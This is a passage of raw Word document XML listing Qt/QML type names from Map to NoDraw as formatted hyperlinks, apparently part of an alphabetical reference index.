                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Map</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64" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapCircle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65" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapGestureArea</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66" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapItemView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67" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapPinchEvent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68" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapPolygon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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapPolyline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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapQuickItem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71" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapRectangle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72" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapRoute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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MapType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74" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Margins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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MaskedBlur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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MaskShape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77" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Material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78" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>matrix4x4</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79" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Matrix4x4</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80" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MediaPlayer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81" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>mediaplayer-qml-dynamic</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82" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Menu: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83" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Menu: QtQuickControls2</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84" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Menu: QtLabsPlatform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85" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuBar: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86" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuBar: QtLabsPlatform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87" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuBarStyle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88" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuItem: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89" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuItem: QtQuickControls2</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90" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuItem: QtLabsPlatform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91" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuItemGroup</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92" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuSeparator: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93" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuSeparator: QtQuickControls2</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94" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuSeparator: QtLabsPlatform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95" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MenuStyle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96" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Mesh</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097" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MessageDialog: QtQuickDialogs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98" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MessageDialog: QtLabsPlatform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099" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ModeKey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00" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MonthGrid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01" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseArea</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02" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseDevice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103" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseEvent: QtQuick</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04" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseEvent: Qt3D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05" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MouseHandler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06" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MultiPointTouchArea</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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>MultiSampleAntiAliasing</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75" w:name="n"/>
            <w:bookmarkEnd w:id="1175"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N</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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NdefFilter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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NdefMimeRecord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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NdefRecord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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NdefTextRecord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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NdefUriRecord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13" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NearField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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Node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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NodeInstantiator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16" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NoDepthMask</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17" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NoDraw</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00B947D3" w:rsidRPr="000821BB" w:rsidRDefault="00490E7E" w:rsidP="000821BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1118" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
